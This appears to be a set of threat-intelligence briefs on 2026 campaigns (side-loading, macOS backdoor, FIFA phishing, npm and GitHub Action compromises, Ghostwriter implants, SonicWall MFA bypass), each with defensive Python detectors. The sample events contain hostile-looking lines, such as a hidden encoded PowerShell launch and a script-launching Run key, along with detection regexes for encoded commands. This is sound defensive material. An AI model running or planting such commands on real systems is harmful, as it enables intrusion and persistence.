Why it matters to us: German and UK targeting with native-language tax/payroll lures puts DACH public-sector and finance staff squarely in scope. Hunt for DLL side-loading chains where trusted binaries (AnyDesk, SyncFuture) load from unexpected working directories, for Python processes reaching DPAPI / Chrome credential stores, and for unsolicited inbound contact on LINE/WhatsApp/Teams that pivots to a "document" — the out-of-band channel is where the email gateway loses visibility.
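
The side-loading hunt named in both TA4922 items on this page (the weekly and this daily), as an added example that is not Proofpoint's code: score Sysmon event 7 image-load records by the classic traits (unsigned DLL, loaded from the host binary's own directory, that directory user-writable, host binary a known side-load target). The records, paths and user are constructed; only AnyDesk.exe is used as a host name because the brief gives no on-disk file name for SyncFuture.

```python
"""Rank Sysmon image-load records for DLL side-loading by a trusted binary from a user-writable path.

Added example; not Proofpoint's code. Records are constructed in the shape of Sysmon
event 7 (Image, ImageLoaded, Signed, SignatureStatus); paths and user names are invented.
"""
import ntpath

# Executables commonly abused as side-load hosts; AnyDesk is the one named in the brief.
SIDELOAD_HOSTS = {"anydesk.exe"}
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

SAMPLE_IMAGE_LOADS = [
    # 1: AnyDesk dropped into Temp, loading an unsigned version.dll next to it: classic side-load
    {"Image": r"C:\Users\anna\AppData\Local\Temp\Steuer2026\AnyDesk.exe",
     "ImageLoaded": r"C:\Users\anna\AppData\Local\Temp\Steuer2026\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # 2: properly installed AnyDesk loading the real system DLL
    {"Image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # 3: per-user install loading its own signed component: user-writable, but signed
    {"Image": r"C:\Users\anna\AppData\Local\Programs\Editor\editor.exe",
     "ImageLoaded": r"C:\Users\anna\AppData\Local\Programs\Editor\ffmpeg.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]


def is_user_writable(path: str) -> bool:
    p = path.lower()
    if p.startswith(PROTECTED_ROOTS):
        return False
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def sideload_score(ev: dict) -> int:
    """0 = signed DLL (benign); each indicator adds a point, 4 means every indicator is present."""
    image, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
    unsigned = ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus", "") != "Valid"
    if not unsigned:
        return 0
    score = 1                                                      # unsigned DLL
    if ntpath.dirname(image).lower() == ntpath.dirname(dll).lower():
        score += 1                                                 # loaded from the host's own directory
    if is_user_writable(ntpath.dirname(dll)):
        score += 1                                                 # that directory is user-writable
    if ntpath.basename(image).lower() in SIDELOAD_HOSTS:
        score += 1                                                 # a known side-load host binary
    return score


def hunt(events, min_score: int = 3) -> list:
    """Return records at or above min_score; 3 already catches unknown host binaries."""
    hits = []
    for ev in events:
        score = sideload_score(ev)
        if score >= min_score:
            hits.append({"process": ev["Image"], "dll": ev["ImageLoaded"], "score": score})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_IMAGE_LOADS):
        print(hit)
```

Keeping the signature check first is what separates record 3 (a legitimate per-user install loading its own signed DLL) from record 1; a rule keyed only on user-writable paths would page on every Electron app in AppData.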

Unit 42 Operation FlutterBridge: notarized macOS backdoor hides its logic in a remote WebView and exfiltrates documents through an "AI summarise" feature

From CTI Daily Brief — 2026-06-05 · published 2026-06-05

Unit 42 details Operation FlutterBridge, the evolution of cluster CL-CRI-1089 (active since August 2025), which distributes macOS backdoors disguised as productivity apps (PodcastsLounge, PDF-Brain, PDF-Ninja) via hundreds of Google Ads bought through verified shell companies (Unit 42, 2026-06-02; The Hacker News, 2026-06-04). Every sample was signed with a valid Apple Developer ID and passed notarization, with zero VirusTotal detections at analysis time — Gatekeeper does not catch these. The FlutterShell payload keeps its malicious logic on an attacker-controlled website and uses a Flutter JavaScript-to-native bridge to translate JSON commands into native macOS calls, so capability changes need no new binary. Confirmed behaviour: arbitrary shell execution, file read/write, environment-variable theft, Chrome hijacking via the "Secure Preferences" file, and document exfiltration routed through the attacker's server under the guise of an AI document-summarisation feature. Targeting is global with explicit emphasis on Western Europe, including France and Germany.

Why it matters to us: notarization-bypassed, Developer-ID-signed macOS malware defeats the controls most teams lean on for Mac fleets. The reliable detection layer is behavioural: macOS endpoint telemetry for apps that instantiate a WKWebView with a custom JS message handler that then spawns shell processes, non-browser writes to Chrome's Secure Preferences, and outbound connections from "productivity" apps to CDN-fronted infrastructure.

Ghost Stadium PhaaS — 300+ FIFA domain clones, multi-language fake SSO, targeting UK/Germany/Portugal/Spain fan credentials before June 11 kickoff

From CTI Daily Brief — 2026-05-30 · published 2026-05-30

The FBI issued PSA260527 on 27 May 2026 warning that a Chinese-speaking financially-motivated threat actor tracked by Group-IB as Ghost Stadium has deployed more than 300 phishing sites impersonating fifa.com, all reproducing the official site pixel-for-pixel including a fake single-sign-on authentication flow in multiple languages (FBI IC3 PSA260527, 2026-05-27; BleepingComputer, 2026-05-28). Typosquatted domains span alternative TLDs (.org, .xyz, .live, .sale) and character substitutions; additional fake employment portals impersonate FIFA HR functions. Criminal objectives include credential and financial-data theft via the fake SSO, counterfeit ticket and hospitality sales, fake merchandise and streaming-rights fraud. UK, Germany, Portugal and Spain are explicitly named as target demographics. Browser-based security controls (Safe Browsing, SmartScreen) do not protect against freshly registered domains before abuse is reported. For defenders at organisations with large employee populations purchasing World Cup tickets: advise bookmarking https://www.fifa.com directly and treat any sponsored search result for FIFA ticket purchases as unverified. The high-intensity fraud window is the lead-up to the July 19 final.
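
A classifier for the domain patterns above (alternative TLDs, character substitution, the brand embedded in a longer name), added as an example and not Group-IB's or the FBI's tooling; it is meant to be run over DNS or proxy logs to surface fifa.com lookalikes. The confusable map and sample hosts are constructed, and there is no public-suffix list, so a .co.uk-style suffix is not handled as a single TLD.

```python
"""Classify a hostname's relationship to fifa.com: alt_tld, lookalike, embedded or unrelated.

Added example; not Group-IB's or the FBI's tooling. The confusable map and the
sample hosts are constructed. No public-suffix list: a two-label suffix such as
.co.uk is treated as label 'co' plus TLD 'uk' (known limitation).
"""
BRAND = "fifa"
LEGIT_SUFFIX = "fifa.com"
# Digraph and single-character substitutions common in lookalike registrations.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "i"), ("3", "e"), ("4", "a"),
               ("5", "s"), ("7", "t"), ("l", "i")]

SAMPLE_HOSTS = ["www.fifa.com", "fifa.xyz", "f1fa.com", "fifa.com.tickets.sale",
                "fifa-hospitality.live", "uefa.com"]


def fold_confusables(label: str) -> str:
    """Map visually similar characters onto the letters they imitate."""
    out = label.lower()
    for src, dst in CONFUSABLES:
        out = out.replace(src, dst)
    return out


def levenshtein(a: str, b: str) -> int:
    """Edit distance; one substitution or insertion away from the brand is a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str) -> str:
    host = host.lower().strip().rstrip(".")
    if host == LEGIT_SUFFIX or host.endswith("." + LEGIT_SUFFIX):
        return "legit"
    labels = host.split(".")
    if len(labels) < 2:
        return "unrelated"
    sld, tld = labels[-2], labels[-1]
    if sld == BRAND and tld != "com":
        return "alt_tld"        # fifa.org, fifa.xyz, fifa.live, fifa.sale
    if levenshtein(fold_confusables(sld), BRAND) <= 1:
        return "lookalike"      # f1fa.com, flfa.com, fifa-.com
    if any(BRAND in label for label in labels):
        return "embedded"       # fifa-hospitality.live, fifa.com.tickets.sale
    return "unrelated"


def triage(hosts) -> list:
    """Return (host, verdict) for everything that is neither the real site nor unrelated."""
    return [(h, v) for h in hosts for v in [classify(h)] if v not in ("legit", "unrelated")]


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_HOSTS):
        print(f"{verdict:10s} {host}")
```

The "embedded" class is where the fake SSO pages tend to live (fifa.com.something.sale reads as the real site in a narrow address bar), so it deserves the same blocking priority as the edit-distance hits.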

Wiz CIRT names JINX-0164 — LinkedIn-recruiter lures, AUDIOFIX macOS infostealer, MINIRAT npm pivot into CI/CD

From CTI Daily Brief — 2026-05-29 · published 2026-05-29

Wiz CIRT identified and named JINX-0164 on 2026-05-27, a financially motivated cluster active since mid-2025 against cryptocurrency organisations. Initial access is LinkedIn-based social engineering — fake recruiter personas direct targets to fraudulent video-conferencing platforms that deliver AUDIOFIX, a compiled-Python macOS binary functioning as both infostealer and backdoor. AUDIOFIX harvests Keychain contents, Chrome / Firefox / Safari credentials, SSH keys, AWS / GCP / Azure cloud-provider credentials, and credentials from 51 cryptocurrency-wallet browser extensions; persistence is a LaunchAgent plist under ~/Library/LaunchAgents. From the endpoint, JINX-0164 pivots into CI/CD infrastructure using stolen developer credentials and injects poisoned commits under legitimate developer identities; any team member building from the affected branches receives MINIRAT, a lightweight Go-based backdoor. The supply-chain escalation materialised through the @velora-dex/sdk npm package version 4.9.1 (trojanised 2026-04-07), which staged MINIRAT via LaunchCtl persistence. Wiz notes TTP overlap with prior DPRK-adjacent tradecraft (UNC1069, Sapphire Sleet) but stops short of formal attribution. The Hacker News writeup corroborates with additional MINIRAT detail. Mapped to T1566.003 (Spearphishing via Service: LinkedIn), T1543.001 (Launch Agent), T1555 (Credentials from Password Stores), T1195.002 (Compromise Software Supply Chain) and T1098.005 (Device Registration). For Swiss / EU SOCs the relevant exposure is Crypto Valley and any organisation whose developers build from npm dependencies that fan out to internal CI/CD — Sigstore signature verification, lock-file pinning of @velora-dex/sdk, and CI runner least-privilege are the operational asks.
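
The lock-file check mentioned above, added as an example (not Wiz's code): scan an npm lockfile for the trojanised @velora-dex/sdk 4.9.1 in both the flat lockfileVersion 2/3 layout and the nested v1 tree. The indicator is the one the brief gives; both lockfiles are constructed.

```python
"""Scan an npm lockfile for the trojanised @velora-dex/sdk release named in the brief.

Added example; not Wiz's code. The indicator (package name and version 4.9.1) is from
the brief; the two lockfiles are constructed in npm's lockfileVersion 3 and 1 layouts.
"""
import json

TROJANISED = {"@velora-dex/sdk": {"4.9.1"}}

SAMPLE_LOCK_V3 = json.dumps({
    "name": "dex-frontend", "lockfileVersion": 3,
    "packages": {
        "": {"name": "dex-frontend", "dependencies": {"@velora-dex/sdk": "^4.9.0"}},
        "node_modules/@velora-dex/sdk": {
            "version": "4.9.1",
            "resolved": "https://registry.npmjs.org/@velora-dex/sdk/-/sdk-4.9.1.tgz"},
        "node_modules/left-pad": {"version": "1.3.0"},
        # a nested copy pinned to an earlier release is not flagged
        "node_modules/widget/node_modules/@velora-dex/sdk": {"version": "4.8.2"},
    },
})

SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-bot", "lockfileVersion": 1,
    "dependencies": {
        "widget": {"version": "2.0.0",
                   "dependencies": {"@velora-dex/sdk": {"version": "4.9.1"}}},
        "left-pad": {"version": "1.3.0"},
    },
})


def iter_lock_entries(lock: dict):
    """Yield (name, version, location) for every installed package in v1, v2 or v3 lockfiles."""
    packages = lock.get("packages")
    if packages is not None:                      # v2 and v3: flat map keyed by install path
        for path, meta in packages.items():
            if path == "":
                continue                          # the root project itself
            name = meta.get("name") or path.split("node_modules/")[-1]
            yield name, meta.get("version"), path
        return

    def walk(deps: dict, prefix: str):            # v1: nested 'dependencies' tree
        for name, meta in deps.items():
            location = f"{prefix}node_modules/{name}"
            yield name, meta.get("version"), location
            yield from walk(meta.get("dependencies", {}), location + "/")

    yield from walk(lock.get("dependencies", {}), "")


def find_trojanised(lock_text: str, indicators: dict = TROJANISED) -> list:
    """Return every installed (name, version) pair that matches the indicator table."""
    lock = json.loads(lock_text)
    return [{"name": n, "version": v, "location": loc}
            for n, v, loc in iter_lock_entries(lock)
            if v in indicators.get(n, ())]


if __name__ == "__main__":
    print(find_trojanised(SAMPLE_LOCK_V3))
    print(find_trojanised(SAMPLE_LOCK_V1))
```

A caret range such as ^4.9.0 in package.json resolves to 4.9.1 on a fresh install, so package.json tells you nothing about exposure; the lock file records what was actually installed, which is why it is the right target for both the scan and the pin.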

Germany's federal cabinet approves the Cybersicherheitsstärkungsgesetz — BKA, BSI and Federal Police gain authority to redirect traffic and disable attacker infrastructure

From CTI Daily Brief — 2026-05-28 · published 2026-05-28

The German federal cabinet approved the Cybersicherheitsstärkungsgesetz (Law to Strengthen Cybersecurity) on 2026-05-27, granting three federal agencies — the Bundeskriminalamt (BKA), the Bundesamt für Sicherheit in der Informationstechnik (BSI) and the Bundespolizei — new authority to conduct what the government frames as active cyber defence rather than offensive hackback (Heise Security, 2026-05-27; onvista / dpa, 2026-05-27; t-online, 2026-05-27). Under the law the agencies may redirect attacker-controlled traffic, selectively intervene in IT systems used to attack Germany, delete or modify data on attacker servers, and shut down dangerous C2 nodes — explicitly including foreign infrastructure. Interior Minister Alexander Dobrindt (CSU) positioned the measure as active cyber defence targeting attacker command-and-control infrastructure rather than retaliatory hackback. The bill funds the order of 350 new positions across the three agencies and approximately €50 million per year in personnel and material (per onvista/dpa; t-online reports a smaller initial figure — see § 7). The Bundesverband der Deutschen Industrie (BDI) and civil-society voices warned of collateral-damage risk on shared hosting and VPN servers and flagged constitutional concerns. The bill next proceeds to the Bundestag; it does not yet have force of law.

Why it matters to us: German LE gaining the legal authority to sinkhole, redirect, or disable attack infrastructure will change the threat-intel attribution picture across Europe. SOC managers should expect that unexplained C2 outages on Germany-adjacent hosting may be LE action rather than malware infrastructure rotation. Threat-intel teams tracking takedown patterns should add de.bka, de.bsi, de.bpol as expected actors in the takedown attribution stack alongside CrowdStrike Counter Adversary Operations, Microsoft DCU and Europol.

Germany's Cybersicherheitsstärkungsgesetz — federal cabinet approves active-cyber-defence powers; Bundestag passage still ahead

From CTI Weekly Summary — 2026-W22 (May 25 – May 31, 2026) · published 2026-05-25

The German federal cabinet approved the Cybersicherheitsstärkungsgesetz (Cyber Security Strengthening Act) on 2026-05-27 — the daily caught the Heise news hit; the primary government sources confirm the substance and, importantly, that it is a draft bill still requiring Bundestag passage and is not yet in force. Per the government's framing, it shifts the state from purely defending the target to acting directly against the attacker — "their servers, their software and their strategy" — with the BSI, BKA and Bundespolizei among the bodies gaining expanded authority to detect and counter large-scale, high-damage attacks (the announcement does not break the new powers down per agency in technical detail). For CH/EU defenders the watch item is the cross-border incident-response implication: once in force, German-authority active operations against infrastructure that may be hosted in or transit other jurisdictions raise coordination and deconfliction questions for any SOC running IR across the DACH region. Track the Bundestag passage; nothing changes operationally until it lands.

UPDATE: Ghostwriter / UAC-0057 / FrostyNeighbor — CERT-UA documents new OYSTERFRESH → OYSTERBLUES → OYSTERSHUCK implant chain via Prometheus learning-platform lures

From CTI Daily Brief — 2026-05-23 · published 2026-05-23 · view item permalink →

UPDATE (originally covered weekly 2026-W21): CERT-UA published a bulletin (surfaced 2026-05-22) on a spring-2026 phishing campaign by Ghostwriter (a.k.a. UAC-0057, UNC1151, FrostyNeighbor) targeting Ukrainian government entities through lures themed on the Prometheus online-learning platform (The Hacker News, 2026-05-22 · SC World, 2026-05-22). The material delta from this week's weekly long-running coverage of FrostyNeighbor / Ghostwriter activity is a new three-stage implant trio distinct from the prior PicassoLoader toolset.

Chain: phishing email from a compromised account → PDF attachment with a link to a ZIP archive → ZIP carrying a JavaScript file (OYSTERFRESH). OYSTERFRESH renders a decoy document as cover while writing an obfuscated, RC4-encrypted OYSTERBLUES payload to the Windows Registry and launching OYSTERSHUCK. OYSTERSHUCK decodes OYSTERBLUES (executed via JavaScript) which then collects computer name, user account, OS version, last boot time and running process list, exfiltrates via HTTP POST to C2, and executes dynamically received JavaScript via eval(). The final payload is assessed as Cobalt Strike. (MITRE ATT&CK overlay added by this brief, not by the CERT-UA narrative as carried by The Hacker News: T1027 Obfuscated Files/Information on the OYSTERFRESH stage, T1547.001 Registry Run Keys on the OYSTERBLUES persistence, T1059.007 JavaScript on OYSTERSHUCK execution, T1219 Remote Access Software on the Cobalt Strike final.)

Defender vantage: CERT-UA's own recommendation is to block wscript.exe execution for standard user accounts — a high-yield control because the OYSTER trio relies on script-host execution from user context. EDR signal: wscript.exe spawning powershell.exe or a base64-encoded command; registry monitoring for new HKCU\Software Run-key values containing binary blobs or script paths; hunt for Cobalt Strike beacon signatures in HTTP POST egress to non-corporate domains. The EU/CH relevance is direct: Ghostwriter historically targets Belgium, Germany, Poland, Lithuania, Latvia and other NATO members alongside Ukraine, and the OYSTER implant chain is a toolset upgrade defenders should expect to see surfaced in EU government tenants and Eastern-Europe-focused think tanks.
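The two EDR signals named above (wscript.exe spawning a shell with an encoded command, and new HKCU Run-key values carrying script paths or binary blobs), worked as an added example that is not CERT-UA's, The Hacker News' or any vendor's detection content. The event dicts are a constructed Sysmon-like shape (event ID 1 process creation, event ID 13 registry value set); the SID, paths, user names and the base64 blob are made up and decode to nothing meaningful.

```python
"""Added example: two detection rules for the OYSTER-style script-host chain,
run over constructed Sysmon-like events (hypothetical field names)."""
import re

# -e / -ec / -enc / -encodedcommand followed by a base64-looking argument
ENCODED_CMD = re.compile(r'(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})')
RUN_KEY = re.compile(r'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', re.I)
SCRIPT_REF = re.compile(r'(?i)\b(?:w|c)script\.exe|\.(?:js|jse|vbs|vbe|wsf)\b')
BLOB = re.compile(r'[A-Za-z0-9+/=]{200,}')   # long opaque value stored in a Run key

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(events):
    """Return one hit per matching event; 'encoded' marks an encoded command
    (EID 1) or an opaque blob (EID 13)."""
    hits = []
    for e in events:
        if e["event_id"] == 1 and basename(e["parent_image"]) == "wscript.exe":
            if basename(e["image"]) in {"powershell.exe", "pwsh.exe", "cmd.exe"}:
                hits.append({"rule": "wscript-spawns-shell", "user": e["user"],
                             "encoded": bool(ENCODED_CMD.search(e["command_line"]))})
        elif e["event_id"] == 13 and RUN_KEY.search(e["target_object"]):
            details = e["details"]
            if SCRIPT_REF.search(details) or BLOB.search(details):
                hits.append({"rule": "runkey-script-or-blob", "user": e["user"],
                             "encoded": bool(BLOB.search(details))})
    return hits

# Constructed events (not captured telemetry). SID and blob are placeholders.
SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"event_id": 1, "user": "CORP\\u.mueller",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUAA"},
    {"event_id": 1, "user": "CORP\\admin",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"event_id": 13, "user": "CORP\\u.mueller",
     "target_object": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"wscript.exe //B C:\Users\Public\upd.js"},
    {"event_id": 13, "user": "CORP\\u.mueller",
     "target_object": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\u.mueller\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"event_id": 13, "user": "CORP\\u.mueller",
     "target_object": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Loader",
     "details": "Q" * 260},   # constructed stand-in for an encrypted payload blob
]

if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(h)
```

The Run-key rule deliberately fires on either a script reference or an opaque blob, because the chain above stores the encrypted OYSTERBLUES stage in the registry separately from the script that launches it; tuning the blob length threshold is the main false-positive lever.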

SonicWall Gen6 SSL-VPN incomplete-patching (CVE-2024-12802) — Akira-linked actors brute-force MFA via UPN/SAM account-name split, February–March 2026 intrusions

From CTI Daily Brief — 2026-05-21 · published 2026-05-21 · view item permalink →

Threat actors whose TTPs are consistent with Akira ransomware activity successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026; SonicWall and incident-response vendors confirm the root cause is that the firmware update for CVE-2024-12802 (CVSS 9.1, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) does not by itself enforce MFA on both User Principal Name (user@domain) and SAM-account-name (DOMAIN\user) login formats — six additional manual LDAP-reconfiguration steps from SonicWall KB kA1VN0000000RBd0AM are required (Cybersecurity Dive, 2026-05-20; BleepingComputer, 2026-05-20). Attackers brute-forced credentials against the UPN login path — which accepts authentication without triggering MFA challenges when the LDAP reconfiguration is incomplete — at speed and without producing the standard authentication alerts; per BleepingComputer's reporting, intrusion responders observed sessions of 30 to 60 minutes during which attackers logged in, performed network reconnaissance, tested credential reuse on internal systems and logged out. Gen6 SSL-VPN reached end-of-life on 2026-04-16 and receives no further security updates; Gen7 and Gen8 are remediated by firmware update alone. Why it matters to us: the technique is a textbook example of why CVSS / vendor-advised patch status is insufficient operational signal — the appliance shows patched-firmware version, MFA appears enabled in the admin UI, and authentications succeed against an alternative account-name format that bypasses the policy enforcement entirely. Detection concept — SonicWall Gen6 SSL-VPN syslog filter for successful SSL-VPN authentications where the login field is UPN-format rather than SAM-format, especially from source IPs with high authentication-attempt volume; correlate with short-duration recon-and-credential-reuse sessions consistent with the 30-to-60-minute pattern BleepingComputer documents. 
Hardening — complete every step in SonicWall KB kA1VN0000000RBd0AM; given Gen6 EoL, migrate to Gen7/Gen8 on a defined cut-over timeline.
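The detection concept above (and the 2026-W21 weekly note on auditing UPN-vs-SAM logins), worked as an added example that is not from the brief, SonicWall or BleepingComputer. The line format, the field names (src=, usr=, msg=) and the message strings are a simplified stand-in for Gen6 SSL-VPN syslog, not the real schema, and the log lines are constructed: one source brute-forces several UPN-format names and then lands a 45-minute session, while a normal SAM-format login is included for contrast.

```python
"""Added example: flag successful UPN-format SSL-VPN logins, annotate them with
attempt volume from the same source and with session length, over constructed
syslog lines (hypothetical format)."""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2026-03-02T08:00:01Z src=203.0.113.10 usr=j.doe@corp.example msg="SSL VPN login failed"
2026-03-02T08:00:02Z src=203.0.113.10 usr=a.smith@corp.example msg="SSL VPN login failed"
2026-03-02T08:00:03Z src=203.0.113.10 usr=b.lee@corp.example msg="SSL VPN login failed"
2026-03-02T08:00:04Z src=203.0.113.10 usr=c.wu@corp.example msg="SSL VPN login failed"
2026-03-02T08:00:05Z src=203.0.113.10 usr=m.muster@corp.example msg="SSL VPN login succeeded"
2026-03-02T08:45:30Z src=203.0.113.10 usr=m.muster@corp.example msg="SSL VPN logout"
2026-03-02T09:10:00Z src=198.51.100.7 usr=CORP\\e.keller msg="SSL VPN login succeeded"
2026-03-02T17:02:00Z src=198.51.100.7 usr=CORP\\e.keller msg="SSL VPN logout"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) usr=(?P<usr>\S+) msg="(?P<msg>[^"]+)"$'
)

def parse(log_text):
    """Parse the constructed format into dicts with a datetime timestamp."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.fromisoformat(d["ts"].replace("Z", "+00:00"))
            events.append(d)
    return events

def is_upn(username):
    """UPN form is user@domain; SAM form is DOMAIN\\user."""
    return "@" in username and "\\" not in username

def find_suspicious_sessions(log_text, min_attempts=5, min_minutes=30, max_minutes=60):
    """Successful UPN-format logins, with the attempt count from the same source
    and the login-to-logout duration when a matching logout is visible."""
    events = parse(log_text)
    attempts = defaultdict(int)
    for e in events:
        if "login" in e["msg"]:            # counts failed and succeeded attempts
            attempts[e["src"]] += 1
    findings = []
    for i, e in enumerate(events):
        if e["msg"] != "SSL VPN login succeeded" or not is_upn(e["usr"]):
            continue
        duration = None
        for later in events[i + 1:]:
            if (later["usr"], later["src"], later["msg"]) == (e["usr"], e["src"], "SSL VPN logout"):
                duration = (later["ts"] - e["ts"]).total_seconds() / 60
                break
        findings.append({
            "src": e["src"],
            "usr": e["usr"],
            "attempts_from_src": attempts[e["src"]],
            "high_volume": attempts[e["src"]] >= min_attempts,
            "session_minutes": duration,
            "short_session": duration is not None and min_minutes <= duration <= max_minutes,
        })
    return findings

if __name__ == "__main__":
    for f in find_suspicious_sessions(SAMPLE_LOG):
        print(f)
```

The UPN/SAM split is the whole signal: a SAM-format login that passed MFA looks identical to a UPN-format login that never saw an MFA challenge unless the login field itself is parsed, so the filter keys on the account-name format first and only then on volume and session length.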

actions-cool/issues-helper GitHub Action compromised — 53 tags moved to imposter commit reading Runner.Worker /proc/PID/mem; linked to Mini Shai-Hulud

From CTI Daily Brief — 2026-05-20 · published 2026-05-20 · view item permalink →

StepSecurity disclosed on 2026-05-18 that all 53 existing version tags of the popular actions-cool/issues-helper GitHub Action were moved to point to an imposter commit (1c9e803) not present in the action's normal branch history, with 15 tags on the companion actions-cool/maintain-one-comment action manipulated in the same operation. The malicious payload downloads the Bun JavaScript runtime to the runner, then spawns a Python process that reads the /proc/<PID>/mem address space of the Runner.Worker process — the GitHub Actions component that holds decrypted workflow secrets during job execution. Captured bytes are filtered via tr + grep for values marked isSecret: true and exfiltrated over HTTPS to t.m-kosche[.]com. Socket confirmed the exfiltration domain overlaps with the Mini Shai-Hulud npm / PyPI campaign cluster (The Hacker News, 2026-05-19). All 53 imposter commits were created within a 3-minute 16-second window; GitHub has since disabled the repository.

Any workflow that referenced actions-cool/issues-helper@v* or a mutable tag during the 2026-05-18 attack window should be treated as a compromised CI/CD pipeline — rotate GitHub PATs, npm tokens, AWS credentials, SSH keys, and any other secret exposed via ${{ secrets.* }} to that workflow. Maps to T1195.002 (Compromise Software Supply Chain) and T1552.001 (Credentials in Files).

Why it matters to us: EU and Swiss developer organisations using GitHub Actions for public-sector software supply chains were directly in scope during the attack window. The mitigation is enforcement of commit-SHA pinning for every third-party Action reference (uses: actions-cool/issues-helper@<full-sha> rather than @v2 or @main) and runtime enforcement of allow-listed outbound network destinations from runners (StepSecurity Harden-Runner, GitHub-native egress filtering).
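The SHA-pinning check recommended above, worked as an added example that is not StepSecurity's, GitHub's or the action maintainers' code. It scans workflow text for `uses:` references with a regex (so it runs without PyYAML), classifies each as SHA-pinned, mutable-ref or local, and marks references to the two actions named in this item that still resolve through a mutable tag. The sample workflow and the 40-hex SHA in it are constructed.

```python
"""Added example: audit GitHub Actions workflow text for third-party actions
not pinned to a full commit SHA (regex-based, no YAML dependency)."""
import re

# Constructed workflow; the SHA below is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: triage
on: [issues]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions-cool/issues-helper@v2
        with:
          actions: 'create-comment'
      - uses: actions-cool/maintain-one-comment@1234567890abcdef1234567890abcdef12345678  # v3
      - uses: ./.github/actions/local-step
      - name: run
        run: echo hi
"""

USES_RE = re.compile(r'^\s*-?\s*uses:\s*([^\s#]+)', re.MULTILINE)
FULL_SHA_RE = re.compile(r'^[0-9a-f]{40}$')

def classify_ref(ref):
    """Return (repo, version, status) for one uses: value."""
    if ref.startswith("./") or ref.startswith("docker://"):
        return (ref, None, "local-or-docker")
    if "@" not in ref:
        return (ref, None, "unpinned-no-ref")
    repo, _, version = ref.rpartition("@")
    if FULL_SHA_RE.match(version):
        return (repo, version, "sha-pinned")
    return (repo, version, "mutable-ref")      # tag or branch: can be moved later

def audit_workflow(text, watchlist=("actions-cool/issues-helper",
                                    "actions-cool/maintain-one-comment")):
    """One finding per uses: reference; needs_rotation is set for watchlisted
    actions referenced through a mutable tag or branch."""
    findings = []
    for m in USES_RE.finditer(text):
        repo, version, status = classify_ref(m.group(1))
        base = "/".join(repo.split("/")[:2])   # drop any sub-path (owner/repo/path)
        findings.append({
            "uses": m.group(1),
            "status": status,
            "on_watchlist": base in watchlist,
            "needs_rotation": base in watchlist and status == "mutable-ref",
        })
    return findings

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f)
```

A SHA pin is only as good as the review that chose it; the check tells you which references an upstream tag move could have redirected, which is the set whose secrets need rotating, not whether the pinned commit itself was inspected.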

SonicWall Gen6 SSL-VPN CVE-2024-12802 — Akira-linked actors bypassing MFA on *officially-patched* firmware

From CTI Weekly Summary — 2026-W21 (May 18 – May 24, 2026) · published 2026-05-18 · view item permalink →

If you did nothing this week: patching alone did not close this. Actors whose TTPs match Akira ransomware successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026, by abusing a UPN/SAM account-name split in the authentication path — covered 2026-05-21.

This is an incomplete-patch case (CVE-2024-12802, CVSS 9.1): the original fix did not fully remediate the MFA-bypass path, so a "patched" appliance can still be brute-forced through the account-name-split primitive. Swiss/EU public-sector and finance estates that treated the earlier SonicWall advisory as closed should re-open it: audit SSL-VPN authentication logs for UPN-vs-SAM mismatches and repeated MFA challenges, and confirm the appliance is on the firmware build that fully closes CVE-2024-12802 rather than the earlier partial fix.

BKA Dream Market arrest — "Speedstepper" detained in Germany after seven years at large

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17 · view item permalink →

